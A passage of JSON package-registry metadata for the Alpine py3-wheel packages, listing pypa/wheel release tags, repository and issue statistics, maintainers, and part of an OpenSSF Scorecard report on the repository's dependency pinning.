job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.283Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":14.64073262366938,"stargazers_count":14.05369442705072,"forks_count":10.75845335003131,"average":9.863220100187853},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":"removed","funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":237,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-01-31T17:57:00.097Z","updated_at":"2023-01-31T17:57:00.097Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39517,"maintainers_count":891,"namespaces_count":3,"keywords_count":6579,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2727},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-06-10T05:16:50.784Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":11124391,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2024-07-28T21:47:40.000Z","latest_release_published_at":"2024-07-28T21:47:40.000Z","latest_release_number":"0.43.0-r0","last_synced_at":"2026-03-05T07:03:43.960Z","created_at":"2024-12-07T06:16:19.488Z","updated_at":"2026-03-05T07:03:43.960Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.21/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge 